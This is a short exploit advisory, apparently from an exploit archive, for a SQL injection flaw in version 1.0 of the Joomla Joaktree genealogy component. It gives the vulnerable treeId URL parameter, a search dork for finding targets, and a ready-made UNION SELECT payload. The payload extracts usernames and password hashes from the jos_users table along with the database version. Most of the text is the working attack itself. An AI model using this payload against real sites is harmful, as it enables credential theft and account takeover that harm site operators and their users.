10057.txt

Joomla Joaktree Component v1.0 SQL Injection Vulnerability
==========================================================

[ Software Information ]
 
[+] Developer : Niels van Dantzig
[+] Download : http://extensions.joomla.org/extensions/miscellaneous/genealogy/9842
[+] Version() : 1.0
[+] License: GNU General Public License (GPL)
[+] Vulnerability : SQL injection
[+] Dork : "R.I.P
 
===========================================================================
 
[ Here we go.. Proof of Concept ]
 
http://server/index.php?option=com_joaktree&view=joaktree&treeId=[INDONESIANCODER]
 
[ Exploit ]
 
-1+union+select+1,1,1,version(),1,666,1,concat(username,0x3a,password),1,1,1,1,1,1,1,1+from+jos_users--
 
===========================================================================